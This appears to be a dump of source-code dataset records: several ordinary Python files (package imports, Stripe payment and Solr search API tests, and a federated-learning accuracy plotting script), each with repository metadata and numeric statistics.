| 22.3 | 48 | 0.735426 | 27 | 223 | 5.62963 | 0.555556 | 0.236842 | 0.171053 | 0.263158 | 0.302632 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183857 | 223 | 9 | 49 | 24.777778 | 0.835165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.166667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
00b797af22fe1f0b033de0d8d2224ba3355322bf | 441 | py | Python | havok_py/utils/__init__.py | yangjinhui11/havok_ml | f00dc11d982adfb6419c91fccb8c36332add9360 | [
"MIT"
] | null | null | null | havok_py/utils/__init__.py | yangjinhui11/havok_ml | f00dc11d982adfb6419c91fccb8c36332add9360 | [
"MIT"
] | null | null | null | havok_py/utils/__init__.py | yangjinhui11/havok_ml | f00dc11d982adfb6419c91fccb8c36332add9360 | [
"MIT"
] | null | null | null | from .simulations import simulate_lorenz
from .simulations import simulate_rossler
from .simulations import simulate_vanderpol_oscillator
from .simulations import simulate_duffing_oscillator
from .simulations import simulate_coupled_vdp
from .simulations import simulate_coupled_vdp_lorenz
from .simulations import simulate_lsim
from .simulations import lorenz
from .dmd import DMD
from .sindy import SINDy
from .utils import hankel_matrix
| 33.923077 | 54 | 0.873016 | 57 | 441 | 6.526316 | 0.298246 | 0.322581 | 0.451613 | 0.545699 | 0.52957 | 0.209677 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 441 | 12 | 55 | 36.75 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
00d316ec796e9bdaaa32f5222f8a0f5fa1e12714 | 96 | py | Python | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_callback.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_callback.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_callback.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/eb/60/f3/07eb813b3b488199a158453d093b48cecec464b896f6fa3a2cad762040 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.427083 | 0 | 96 | 1 | 96 | 96 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
00ef36a18f2f60e60440edeb9d4de89283c1ec19 | 160 | py | Python | wemos-d1-mini/main.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
] | 3 | 2017-09-03T17:17:44.000Z | 2017-12-10T12:26:46.000Z | wemos-d1-mini/main.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
] | null | null | null | wemos-d1-mini/main.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
] | 2 | 2017-10-01T01:10:55.000Z | 2018-07-15T19:49:29.000Z | # main.py - select startup program
import scroller # OLED-demo
import sht30_demo # SHT30 shield demo
#TODO: show temperature and humidity on OLED display
| 26.666667 | 53 | 0.7625 | 23 | 160 | 5.26087 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030769 | 0.1875 | 160 | 5 | 54 | 32 | 0.9 | 0.69375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
da94dae4ed99dc8089a836ab148535e662f62a0b | 4,214 | py | Python | brambling/tests/integration/test_stripe.py | j-po/django-brambling | be072903fbdecb94f1ec4680b717adc44e73c80b | [
"BSD-3-Clause"
] | null | null | null | brambling/tests/integration/test_stripe.py | j-po/django-brambling | be072903fbdecb94f1ec4680b717adc44e73c80b | [
"BSD-3-Clause"
] | null | null | null | brambling/tests/integration/test_stripe.py | j-po/django-brambling | be072903fbdecb94f1ec4680b717adc44e73c80b | [
"BSD-3-Clause"
] | null | null | null | from decimal import Decimal
from django.test import TestCase
import stripe
from brambling.models import Event, Transaction
from brambling.tests.factories import EventFactory, OrderFactory
from brambling.utils.payment import stripe_prep, stripe_charge, stripe_refund
class StripeTestCase(TestCase):
def test_charge__no_customer(self):
event = EventFactory(api_type=Event.TEST,
application_fee_percent=Decimal('2.5'))
order = OrderFactory(event=event)
self.assertTrue(event.stripe_connected())
stripe_prep(Event.TEST)
stripe.api_key = event.organization.stripe_test_access_token
token = stripe.Token.create(
card={
"number": '4242424242424242',
"exp_month": 12,
"exp_year": 2050,
"cvc": '123'
},
)
charge = stripe_charge(
token,
amount=42.15,
order=order,
event=event,
)
self.assertIsInstance(charge.balance_transaction, stripe.StripeObject)
self.assertEqual(charge.balance_transaction.object, "balance_transaction")
self.assertEqual(len(charge.balance_transaction.fee_details), 2)
self.assertEqual(charge.metadata, {'order': order.code, 'event': event.name})
txn = Transaction.from_stripe_charge(charge, api_type=event.api_type, event=event)
# 42.15 * 0.025 = 1.05
self.assertEqual(txn.application_fee, Decimal('1.05'))
# (42.15 * 0.029) + 0.30 = 1.52
self.assertEqual(txn.processing_fee, Decimal('1.52'))
refund = stripe_refund(
order=order,
event=event,
payment_id=txn.remote_id,
amount=txn.amount
)
self.assertEqual(refund['refund'].metadata, {'order': order.code, 'event': event.name})
refund_txn = Transaction.from_stripe_refund(refund, api_type=event.api_type, related_transaction=txn, event=event)
self.assertEqual(refund_txn.amount, -1 * txn.amount)
self.assertEqual(refund_txn.application_fee, -1 * txn.application_fee)
self.assertEqual(refund_txn.processing_fee, -1 * txn.processing_fee)
def test_charge__customer(self):
event = EventFactory(api_type=Event.TEST,
application_fee_percent=Decimal('2.5'))
order = OrderFactory(event=event)
self.assertTrue(event.stripe_connected())
stripe_prep(Event.TEST)
token = stripe.Token.create(
card={
"number": '4242424242424242',
"exp_month": 12,
"exp_year": 2050,
"cvc": '123'
},
)
customer = stripe.Customer.create(
card=token,
)
card = customer.default_card
charge = stripe_charge(
card,
amount=42.15,
event=event,
order=order,
customer=customer
)
self.assertIsInstance(charge.balance_transaction, stripe.StripeObject)
self.assertEqual(charge.balance_transaction.object, "balance_transaction")
self.assertEqual(len(charge.balance_transaction.fee_details), 2)
self.assertEqual(charge.metadata, {'order': order.code, 'event': event.name})
txn = Transaction.from_stripe_charge(charge, api_type=event.api_type, event=event)
# 42.15 * 0.025 = 1.05
self.assertEqual(txn.application_fee, Decimal('1.05'))
# (42.15 * 0.029) + 0.30 = 1.52
self.assertEqual(txn.processing_fee, Decimal('1.52'))
refund = stripe_refund(
order=order,
event=event,
payment_id=txn.remote_id,
amount=txn.amount
)
self.assertEqual(refund['refund'].metadata, {'order': order.code, 'event': event.name})
refund_txn = Transaction.from_stripe_refund(refund, api_type=event.api_type, related_transaction=txn, event=event)
self.assertEqual(refund_txn.amount, -1 * txn.amount)
self.assertEqual(refund_txn.application_fee, -1 * txn.application_fee)
self.assertEqual(refund_txn.processing_fee, -1 * txn.processing_fee)
| 39.383178 | 122 | 0.62411 | 468 | 4,214 | 5.438034 | 0.16453 | 0.10609 | 0.037721 | 0.056582 | 0.798428 | 0.798428 | 0.798428 | 0.798428 | 0.798428 | 0.798428 | 0 | 0.042705 | 0.266493 | 4,214 | 106 | 123 | 39.754717 | 0.780654 | 0.023968 | 0 | 0.719101 | 0 | 0 | 0.049172 | 0 | 0 | 0 | 0 | 0 | 0.247191 | 1 | 0.022472 | false | 0 | 0.067416 | 0 | 0.101124 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
971a8332c9d4e35a7894867d57e7c6b929706481 | 63 | py | Python | backend/app/views/insert_parts_on_backbones/__init__.py | Edinburgh-Genome-Foundry/CUBA | d57565951ead619ef9263e8b356b451001fb910f | [
"MIT"
] | 15 | 2018-02-12T13:12:13.000Z | 2021-08-15T11:37:59.000Z | backend/app/views/insert_parts_on_backbones/__init__.py | Edinburgh-Genome-Foundry/CUBA | d57565951ead619ef9263e8b356b451001fb910f | [
"MIT"
] | 9 | 2020-06-05T17:54:54.000Z | 2022-02-12T12:03:19.000Z | backend/app/views/insert_parts_on_backbones/__init__.py | Edinburgh-Genome-Foundry/CUBA | d57565951ead619ef9263e8b356b451001fb910f | [
"MIT"
] | 3 | 2018-10-18T13:08:50.000Z | 2020-08-17T14:09:46.000Z | from .InsertPartsOnBackbones import InsertPartsOnBackbonesView
| 31.5 | 62 | 0.920635 | 4 | 63 | 14.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063492 | 63 | 1 | 63 | 63 | 0.983051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
97889375c18a09949667b77fbeccec409b0f0458 | 68 | py | Python | jmdict/__init__.py | agent-whisper/jmdict-xml-wrapper | 8befb81d5aee8977293785e2b24bf8067351b3ea | [
"MIT"
] | 2 | 2021-04-12T14:20:12.000Z | 2021-06-23T12:44:15.000Z | jmdict/__init__.py | agent-whisper/jmdict-xml-wrapper | 8befb81d5aee8977293785e2b24bf8067351b3ea | [
"MIT"
] | null | null | null | jmdict/__init__.py | agent-whisper/jmdict-xml-wrapper | 8befb81d5aee8977293785e2b24bf8067351b3ea | [
"MIT"
] | null | null | null | from .xml.models import JMDict
from .xml.engine import JMDictEngine
| 22.666667 | 36 | 0.823529 | 10 | 68 | 5.6 | 0.7 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 68 | 2 | 37 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
979a8b0ba9d0a987048a88f3289283f0f02d7bb8 | 152 | py | Python | configs/oscar/oscar_gqa.py | linxi1158/iMIX | af87a17275f02c94932bb2e29f132a84db812002 | [
"Apache-2.0"
] | 23 | 2021-06-26T08:45:19.000Z | 2022-03-02T02:13:33.000Z | configs/oscar/oscar_gqa.py | XChuanLee/iMIX | 99898de97ef8b45462ca1d6bf2542e423a73d769 | [
"Apache-2.0"
] | null | null | null | configs/oscar/oscar_gqa.py | XChuanLee/iMIX | 99898de97ef8b45462ca1d6bf2542e423a73d769 | [
"Apache-2.0"
] | 9 | 2021-06-10T02:36:20.000Z | 2021-11-09T02:18:16.000Z | _base_ = [
'../_base_/models/oscar/oscar_gqa_config.py',
'../_base_/datasets/oscar/oscar_gqa_dataset.py',
'../_base_/default_runtime.py',
]
| 25.333333 | 52 | 0.671053 | 19 | 152 | 4.684211 | 0.526316 | 0.224719 | 0.292135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 152 | 5 | 53 | 30.4 | 0.669173 | 0 | 0 | 0 | 0 | 0 | 0.756579 | 0.756579 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
97aecfeca586e462c94b489ef6b1e8c429068da8 | 9,639 | py | Python | sleuth_backend/tests/test_views.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 12 | 2017-09-17T02:14:35.000Z | 2022-01-09T10:14:59.000Z | sleuth_backend/tests/test_views.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 92 | 2017-09-16T23:50:45.000Z | 2018-01-02T01:56:33.000Z | sleuth_backend/tests/test_views.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 5 | 2017-12-26T01:47:36.000Z | 2021-12-31T11:15:07.000Z | import json
import pysolr
from django.test import TestCase
from django.http import HttpResponse
from unittest.mock import MagicMock, patch
from sleuth_backend.views.views import cores, search, getdocument
class MockGet(object):
def __init__(self, params):
self.params = params
def get(self, param, default):
return self.params[param] if param in self.params else default
class MockRequest(object):
def __init__(self, method, get=None):
self.method = method
if get is not None:
self.GET = get
class TestAPI(TestCase):
@patch('sleuth_backend.solr.connection.SolrConnection.core_names')
def test_cores_without_get(self, mock_core_names):
mock_core_names.return_value = ['core1', 'core2']
mock_request = MockRequest('POST')
result = cores(mock_request)
self.assertEqual(result.status_code, 405)
@patch('sleuth_backend.solr.connection.SolrConnection.core_names')
def test_cores_with_get(self, mock_core_names):
mock_core_names.return_value = ['core1', 'core2']
mock_request = MockRequest('GET')
result = cores(mock_request)
self.assertEqual(result.status_code, 200)
self.assertEqual(result.content, b'["core1", "core2"]')
@patch('sleuth_backend.solr.connection.SolrConnection.query')
def test_apis_without_get(self, mock_query):
mock_query.return_value = {}
mock_request = MockRequest('POST')
result = search(mock_request)
self.assertEqual(result.status_code, 405)
result = getdocument(mock_request)
self.assertEqual(result.status_code, 405)
@patch('sleuth_backend.solr.connection.SolrConnection.query')
def test_apis_without_params(self, mock_query):
mock_query.return_value = {}
mock_request = MockRequest('GET', get=MockGet({}))
result = search(mock_request)
response_body = json.loads(result.content)
self.assertEqual(result.status_code, 400)
self.assertEqual(response_body['errorType'], 'INVALID_SEARCH_REQUEST')
result = getdocument(mock_request)
response_body = json.loads(result.content)
self.assertEqual(result.status_code, 400)
self.assertEqual(response_body['errorType'], 'INVALID_GETDOCUMENT_REQUEST')
@patch('sleuth_backend.solr.connection.SolrConnection.core_names')
@patch('sleuth_backend.solr.connection.SolrConnection.query')
def test_apis_with_valid_request(self, mock_query, mock_cores):
mock_cores.return_value = ['genericPage', 'redditPost', 'courseItem']
# genericPage search
mock_query.return_value = {
"type": "genericPage",
"response": {
"numFound": 1,
"start": 0,
"docs": [
{
"id": ["www.cool.com"],
"description": ["Nice one dude"],
}
]
},
"highlighting": {
"www.cool.com": {
"content": ['Nice one dude']
}
}
}
params = {
'q': 'somequery',
'type': 'genericPage',
'return': 'content'
}
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 200)
mock_response = mock_query.return_value
mock_response['response']['docs'][0]['id'] = 'www.cool.com'
mock_response['response']['docs'][0]['updatedAt'] = ''
mock_response['response']['docs'][0]['name'] = ''
mock_response['response']['docs'][0]['description'] = 'Nice one dude'
self.maxDiff = None
self.assertEqual(
json.loads(result.content.decode('utf-8')),
{
"data": [{"type": "genericPage", "response": {"numFound": 1, "start": 0, "docs": [{"id": "www.cool.com", "description": "Nice one dude", "updatedAt": "", "name": "", "content": ""}]},
"highlighting": {"www.cool.com": {"content": ["Nice one dude"]}}}],
"request": {"query": "somequery", "types": ["genericPage"], "return_fields": ["id", "updatedAt", "name", "description", "content"], "state": ""}
}
)
# multicore search
mock_cores.return_value = ['courseItem', 'courseItem']
params = { 'q': 'somequery' }
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 200)
self.assertEqual(
json.loads(result.content.decode('utf-8')),
{'data': [{'type': 'courseItem', 'response': {'numFound': 1, 'start': 0, 'docs': [{'id': 'www.cool.com', 'description': 'Nice one dude', 'updatedAt': '', 'name': '', 'content': ''}]}, 'highlighting': {'www.cool.com': {'content': ['Nice one dude']}}}, {'type': 'courseItem', 'response': {'numFound': 1, 'start': 0, 'docs': [
{'id': 'www.cool.com', 'description': 'Nice one dude', 'updatedAt': '', 'name': '', 'content': ''}]}, 'highlighting': {'www.cool.com': {'content': ['Nice one dude']}}}], 'request': {'query': 'somequery', 'types': ['courseItem', 'courseItem'], 'return_fields': ['id', 'updatedAt', 'name', 'description'], 'state': ''}}
)
# redditPost search
mock_cores.return_value = ['genericPage', 'redditPost', 'courseItem']
mock_query.return_value['type'] = 'redditPost'
mock_query.return_value['highlighting']['www.cool.com'] = {'content': ['Nice']}
params = { 'q': 'somequery', 'type': 'redditPost' }
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 200)
mock_response = mock_query.return_value
# getdocument
params = {
'id': 'somequery',
'type': 'genericPage',
'return': 'content'
}
mock_request = MockRequest('GET', get=MockGet(params))
result = getdocument(mock_request)
self.assertEqual(result.status_code, 200)
self.assertEqual(
json.loads(result.content.decode('utf-8')),
{'data': {'type': 'genericPage', 'doc': {'id': 'www.cool.com', 'description': 'Nice one dude', 'updatedAt': '', 'name': '', 'content': ''}}, 'request': {
'query': 'somequery', 'types': ['genericPage'], 'return_fields': ['id', 'updatedAt', 'name', 'description', 'content'], 'state': ''}}
)
mock_query.return_value['response']['numFound'] = 0
mock_request = MockRequest('GET', get=MockGet(params))
result = getdocument(mock_request)
self.assertEqual(result.status_code, 404)
@patch('sleuth_backend.solr.connection.SolrConnection.core_names')
@patch('sleuth_backend.solr.connection.SolrConnection.query')
def test_apis_with_error_response(self, mock_query, mock_cores):
mock_cores.return_value = ['test']
# Solr response error
mock_query.return_value = {
"error": {
"msg": "org.apache.solr.search.SyntaxError",
"code": 400,
}
}
params = {
'q': 'somequery',
'type': 'test',
}
expected_response = json.dumps({
"message": "org.apache.solr.search.SyntaxError on core test",
"errorType": "SOLR_SEARCH_ERROR",
})
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 400)
self.assertEqual(result.content.decode("utf-8"), expected_response)
mock_request = MockRequest('GET', get=MockGet({'id':'query', 'type': 'test'}))
result = getdocument(mock_request)
self.assertEqual(result.status_code, 400)
self.assertEqual(result.content.decode("utf-8"), expected_response)
# pysolr error
mock_query.side_effect = pysolr.SolrError()
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 400)
mock_request = MockRequest('GET', get=MockGet({'id':'query'}))
result = getdocument(mock_request)
self.assertEqual(result.status_code, 400)
# Key error
mock_query.side_effect = KeyError()
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 500)
mock_request = MockRequest('GET', get=MockGet({'id':'query'}))
result = getdocument(mock_request)
self.assertEqual(result.status_code, 500)
# Value error
mock_query.side_effect = ValueError()
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 500)
mock_request = MockRequest('GET', get=MockGet({'id':'query'}))
result = getdocument(mock_request)
self.assertEqual(result.status_code, 500)
# Invalid param error
params = {
'q': 'somequery',
'type': 'asdlialisfas',
}
mock_request = MockRequest('GET', get=MockGet(params))
result = search(mock_request)
self.assertEqual(result.status_code, 400)
mock_request = MockRequest('GET', get=MockGet({'id':'query','type':'asdf'}))
result = getdocument(mock_request)
self.assertEqual(result.status_code, 400)
| 44.419355 | 335 | 0.599855 | 993 | 9,639 | 5.649547 | 0.119839 | 0.078431 | 0.08984 | 0.10107 | 0.808734 | 0.752406 | 0.737433 | 0.722816 | 0.715152 | 0.674688 | 0 | 0.012414 | 0.247847 | 9,639 | 216 | 336 | 44.625 | 0.761379 | 0.015251 | 0 | 0.510753 | 0 | 0 | 0.221367 | 0.057477 | 0 | 0 | 0 | 0 | 0.155914 | 1 | 0.048387 | false | 0 | 0.032258 | 0.005376 | 0.102151 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
97d096b5ae42717946e175bd22dc2bf7e8a65f62 | 50 | py | Python | koocook_core/management/commands/_scrape/__init__.py | KooCook/koocook-dj | 33bfaf48e8363013ddd083d5d8542496c50fd5d3 | [
"BSD-3-Clause"
] | 1 | 2020-10-19T04:44:49.000Z | 2020-10-19T04:44:49.000Z | koocook_core/management/commands/_scrape/__init__.py | KooCook/koocook-dj | 33bfaf48e8363013ddd083d5d8542496c50fd5d3 | [
"BSD-3-Clause"
] | 26 | 2019-11-11T03:37:03.000Z | 2019-12-15T23:18:18.000Z | koocook_core/management/commands/_scrape/__init__.py | KooCook/koocook-dj | 33bfaf48e8363013ddd083d5d8542496c50fd5d3 | [
"BSD-3-Clause"
] | 1 | 2020-11-08T14:36:21.000Z | 2020-11-08T14:36:21.000Z | from . import allrecipes
from . import epicurious
| 16.666667 | 24 | 0.8 | 6 | 50 | 6.666667 | 0.666667 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 50 | 2 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c13f8a1eb91051df5fc2f34cdddce6347ea4cecb | 119 | py | Python | example/asr/text.py | rosinality/imputer-pytorch | 7ff8f73dcd7bd62a98c5b8a126946c5fe381d895 | [
"MIT"
] | 41 | 2020-04-21T08:24:07.000Z | 2021-12-03T06:12:39.000Z | example/asr/text.py | rosinality/imputer-pytorch | 7ff8f73dcd7bd62a98c5b8a126946c5fe381d895 | [
"MIT"
] | null | null | null | example/asr/text.py | rosinality/imputer-pytorch | 7ff8f73dcd7bd62a98c5b8a126946c5fe381d895 | [
"MIT"
] | 3 | 2020-09-29T08:50:38.000Z | 2021-05-11T08:57:37.000Z | import re
re_whitespace = re.compile(r'\s+')
def collapse_whitespace(text):
return re_whitespace.sub(' ', text)
| 14.875 | 39 | 0.705882 | 17 | 119 | 4.764706 | 0.647059 | 0.296296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151261 | 119 | 7 | 40 | 17 | 0.80198 | 0 | 0 | 0 | 0 | 0 | 0.033613 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
c14d3ba8ee9a635496f91eb73be1197731c2b1be | 37,600 | py | Python | makegraph.py | aviramlachmani/flsim-E3CS-impl | 8129f581dada4f20b8b2bfe66cf79d30b5d84677 | [
"Apache-2.0"
] | null | null | null | makegraph.py | aviramlachmani/flsim-E3CS-impl | 8129f581dada4f20b8b2bfe66cf79d30b5d84677 | [
"Apache-2.0"
] | null | null | null | makegraph.py | aviramlachmani/flsim-E3CS-impl | 8129f581dada4f20b8b2bfe66cf79d30b5d84677 | [
"Apache-2.0"
] | null | null | null | import os.path
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import numpy as np
def graph():
# graph EMNIST-Letter, iid, FedAvg-based
round_t = []
emnist_random_iid_a = [0] * 400
emnist_FedCS_iid_a = [0] * 400
emnist_pow_d_iid_a = [0] * 400
emnist_E3CS_0_iid_a = [0] * 400
emnist_E3CS_05_iid_a = [0] * 400
emnist_E3CS_08_iid_a = [0] * 400
emnist_E3CS_inc_iid_a = [0] * 400
if os.path.isfile("output_emnist_random_iid_a.txt"):
emnist_random_iid_a_file = open("output_emnist_random_iid_a.txt")
emnist_random_iid_a = []
with emnist_random_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_iid_a.append(float(line[3]) / 100)
round_t.append(int(line[1]))
else:
x += 1
if os.path.isfile("output_emnist_FedCS_iid_a.txt"):
emnist_FedCS_iid_a_file = open("output_emnist_FedCS_iid_a.txt")
emnist_FedCS_iid_a = []
with emnist_FedCS_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_iid_a.txt"):
emnist_pow_d_iid_a_file = open("output_emnist_pow-d_iid_a.txt")
emnist_pow_d_iid_a = []
with emnist_pow_d_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_iid_a.txt"):
emnist_E3CS_0_iid_a_file = open("output_emnist_E3CS_0_iid_a.txt")
emnist_E3CS_0_iid_a = []
with emnist_E3CS_0_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_iid_a.txt"):
emnist_E3CS_05_iid_a_file = open("output_emnist_E3CS_05_iid_a.txt")
emnist_E3CS_05_iid_a = []
with emnist_E3CS_05_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_iid_a.txt"):
emnist_E3CS_08_iid_a_file = open("output_emnist_E3CS_08_iid_a.txt")
emnist_E3CS_08_iid_a = []
with emnist_E3CS_08_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_iid_a.txt"):
emnist_E3CS_inc_iid_a_file = open("output_emnist_E3CS_inc_iid_a.txt")
emnist_E3CS_inc_iid_a = []
with emnist_E3CS_inc_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(1)
plt.plot(round_t, emnist_E3CS_0_iid_a, "pink")
plt.plot(round_t, emnist_E3CS_05_iid_a, 'b')
plt.plot(round_t, emnist_E3CS_08_iid_a, 'c')
plt.plot(round_t, emnist_E3CS_inc_iid_a, 'g')
plt.plot(round_t, emnist_FedCS_iid_a, 'y')
plt.plot(round_t, emnist_random_iid_a, 'orange')
plt.plot(round_t, emnist_pow_d_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, iid, FedAvg-based")
